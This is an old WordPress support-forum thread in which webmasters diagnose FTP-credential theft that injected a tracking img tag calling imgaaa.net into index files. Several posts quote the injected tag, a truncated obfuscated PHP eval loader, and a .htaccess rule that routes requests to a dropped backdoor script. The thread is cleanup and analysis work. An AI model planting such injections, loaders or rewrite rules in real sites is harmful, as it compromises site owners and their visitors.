WordPress.org

Forums

[resolved] XML parsing error (42 posts)

  1. iciman
    Member
    Posted 4 years ago #

    I have started to get a "XML parsing error" from my website http://www.glamourgrannytravels.com

    W3C Validator says that it is coming from line 195:
    <img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=6744753">

    This is directly after the </rss> line.

    I have no idea how to clear the problem!! Could somebody please explain the problem, how this line got there after the site is over 4 months old and most importantly how to solve it.

    Thank you in advance.

  2. esmi
    Forum Moderator
    Posted 4 years ago #

    Have you tried:

    - checking through Troubleshooting WordPress 3.1 - Master List

    - deactivating all plugins to see if this resolves the problem. If this works, re-activate the plugins one by one until you find the problematic plugin(s).

    - switching to the Twenty Ten theme to rule out any theme-specific problems.

    - resetting the plugins folder by FTP or PhpMyAdmin. Sometimes, an apparently inactive plugin can still cause problems.

  3. iciman
    Member
    Posted 4 years ago #

    Thank you for your response. I have tried all of these suggestions but none of them worked.

    Please suggest another way of solving this problem.

  4. esmi
    Forum Moderator
    Posted 4 years ago #

    Try looking in your theme's footer.php template file. You've got a whole load of code outside of the </body></html> tags.

  5. jbekker
    Member
    Posted 4 years ago #

    You or someone who also uses your FTP data had got a trojan --> win32/kryptik

    This trojan sents all your FTP data and passwords to someone who than uses it to change all index.html and index.php files on your server and adds to the end a string like <img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=6744753">
    the number at the end changes on every file...

    I had it today for a few customers on Joomla sites

    John Bekker
    SJL Creations

  6. domasgel
    Member
    Posted 4 years ago #

    Anyone know how to fully remove this trojan? In my web site hosting i saw this line end of file: <img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=6744753">. Also in my hosting was IP: 46.252.134.6. Help.

  7. esmi
    Forum Moderator
    Posted 4 years ago #

  8. domasgel
    Member
    Posted 4 years ago #

    Sorry, 'emsi', I'm not newbie and this not helps, I'm not using WordPress. It's was on no CMS website.

  9. esmi
    Forum Moderator
    Posted 4 years ago #

    Then why are you posting on a WordPress support forum?

  10. iciman
    Member
    Posted 4 years ago #

    Thank you John. You was right. I removed the code from the index.php and it sorted it out. Unfortunately I have now found it on some of my other sites I look after :-(

    So it looks like virus scans all night and then checking the other sites.

    Thanks again John.

  11. esmi
    Forum Moderator
    Posted 4 years ago #

  12. jbekker
    Member
    Posted 4 years ago #

    "So it looks like virus scans all night and then checking the other sites."
    REMEMBER: its NOT wordpress that got hacked but YOUR PC

      Make sure:

    1. that the virus is removed from your PC
    2. you change ALL ftp passwords on the sites you used
    3. just over write all files with tha latest word press
    4. Check if there are more lines on your server
    5. //find all string imgaaa.net in all subdirs
      grep -lr imgaaa.net . > bad.txt

  13. Sventy
    Member
    Posted 4 years ago #

    @emsi - it makes sense to post here. Be it only to make clear it is not a WP epxloit (what one might think at first) - We have also Joomla, and custom coded websites affected by this.

    Important Note: the attack comes in two stages. In stage one you see the html code injected as above.
    About a day later I see uploads of files that have names like "23.php" or "56.php" - allways a two digit number.

    Those files are start with something like:

    <? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ...UQ=='))); ?>

    I haven't yet decoded the binary to see what it does.

    You also see an upload of a .htaccess file wit this content:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]
    </IfModule>

    Where the binary code is being uncompressed and executed.

    From what I can see on my behalf I suspect the involvement of the TR/Crypt.XPACK.Gen Trojan - but I can not yet 100% confirm it.

    Sven

  14. jbekker
    Member
    Posted 4 years ago #

    Sven, you're right its not a WP bug of hole but the initial attack comes from a Trojan on your PC...

    After getting you FTP data it changes the index.php and index.html files on the FTP servers...

    Did not know about the second step. Fortunately i changed all FTP passwords..

  15. Sventy
    Member
    Posted 4 years ago #

    Yes it starts with a Trojan - what bothers me is the 2 step approach. I don't quite understand what the motivation is. If the Trojan sends out the passwords - why do they need the HTML injection to report the URL back? The Trojan could tell them...

  16. jbekker
    Member
    Posted 4 years ago #

    maby they use the injection to check if the site is monitored and only infect sites that call back for a while...

  17. Sventy
    Member
    Posted 4 years ago #

    @jbekker - yes I thought about this. Or maybe to clean the incoming passwords from outdated login data, that doesn't work anymore and have only passwords that still work.

    But the "price" for this would be an extreme high detection rate. If you look around the internet - almost all discussion start because a website didn't work anymore. Just appending a html code will brake many Scripts even such popular like WP and Joomla.

    So why provoke such a high attention/detection rate?

    What comes to my mind is: to divert our attention from what they are really doing. I have seen this once before: A very obvious attack, easy to detect and easy to clean up. At the same time a very smart hidden backdoor was installed, which you might not notice because you clean up the easy, obvious stuff.

    Sven

  18. Sventy
    Member
    Posted 4 years ago #

    interesting discussion and some clean up stuff in this thread here:

  19. Abdessamad Idrissi
    Member
    Posted 4 years ago #

    so far ther's another two topics dealing with the same issue:
    malicious 96.php in wordpress
    RSS feed won't validate, junk after document element

    The big question is: how this trojans got our "secured" ftp passwords? I'm using FileZilla as a client, what about you?

  20. UseShots
    Member
    Posted 4 years ago #

    Hi,

    Can anyone send me this 96.php (or whatever it is called on your server) file? I believe, there may be some more files involved. You can contact me here.
    http://www.UnmaskParasites.com/contact/

    @jbekker: How do you know about the "win32/kryptik"? (I agree that passwords stealling malware may be involved. I just want to know how you figured out it was "win32/kryptik". Did you find it on computer of webmasters?)

  21. Abdessamad Idrissi
    Member
    Posted 4 years ago #

    here's the content of this nasty thing:
    [Code moderated as per the Forum Rules. Please use the pastebin]

    it writes also to index.php and htaccess and leaves some html pages in the logs folder of the website.

  22. jbekker
    Member
    Posted 4 years ago #

    @UseShots I blamed the Kryptik because the outbreak occurred after the virus warning popped up on the laptop.

  23. Abdessamad Idrissi
    Member
    Posted 4 years ago #

    Sorry moderator forposting the file directly on the thread, I put it now on http://pastebin.com/0JRY8GcX

  24. UseShots
    Member
    Posted 4 years ago #

    Thanks @jbekker and @Abdessamad Idrissi.

    Did you notice the .log/ directory or some other directory whose name begins with the "."?

  25. jbekker
    Member
    Posted 4 years ago #

    @UseShots I looked for .(dot) directories but did not found any.

    I Changed all FTP passwords right after discovery of the breach...
    So this might have helped preventing the next step in the attack

    I checked the FTP logs and all index.php and index.html files where uploade using FTP from IP 46.252.130.109

  26. UseShots
    Member
    Posted 4 years ago #

    Hi,

    I checked hundreds of infected sites (with nn.php scripts) and almost every one of them contained the ".log/<domain_name>" directory next to that script. The directory contains cached spammy pages and attack maintenance files (e.g. malicious scripts).

    Can anyone who found such nn.php files on their site please contact me?
    http://www.UnmaskParasites.com/contact/ (even if you've already removed them). I need some additional information.

    Thanks for your help!

  27. Abdessamad Idrissi
    Member
    Posted 4 years ago #

    I checked my ftp logs and found the bad guys who put this files come from from this IP 91.200.240.10 which leads to Ukrain

    Another bad thing is the fact that google says in his search results that my website is pirated! just next to the result title!

    fortunately I used google webmaster tool to report this and was corrected the next day.

    Again, change all your ftp passwords; I forget one password and the virus hit me again. it planted a file in the wordpress/wp-admin/41.php

  28. Abdessamad Idrissi
    Member
    Posted 4 years ago #

    Please everybody, tell us what ftp client do you use?
    I would like to know how did this a** h**** (sorry for my bad language!) got my passwords?

    I use the latest version of FileZilla ftp client for windows.
    (and a big security hole: i saved all my pases in a word document with a strong password)

    what about you?

  29. jbekker
    Member
    Posted 4 years ago #

    I was also using Filezilla. And filezilla save your passwords in clear text.

    So after changing all passwords i did not save them anymore in Filzilla

  30. iciman
    Member
    Posted 4 years ago #

    Hello everybody and thanks for all the comments and questions.

    I started this thread about a month a go because I had the problem on one of my websites. After reading the replies I soon discovered that I had the same problem on all of the websites I look after (around 20 of them!!) What a weekend I had deleting and changing passwords. It also created problems with the feeds on the wordpress sites with one site being banned because of this problem.

    I have noticed that there is a little bit of a reacurring theme in a lot of the replies, that is - that FileZilla is used by people with the problem. I to use the program for file transfers and have done for a number of years. I am going to post on FileZilla forum today to see what response I get from them.

    Anyway, after a month I have just discovered that it is back on one of my sites (and I haven't checked the others yet due to having to delete over 15,000 files added to the site!!!). My question is this - as anybody got a definitive answer in how to remove this problrm for good? And how did it start? I have AVG antivirus and adaware with automatic virus checks setup for 4 times a week. Yes, I have had viruses on my computer but I have not worked on some of the sites that got infected for months but they still got infected - How?

    This is the most frustrating time for me because I have people relying on me to look after there sites.

Topic Closed

This topic has been closed to new replies.

About this Topic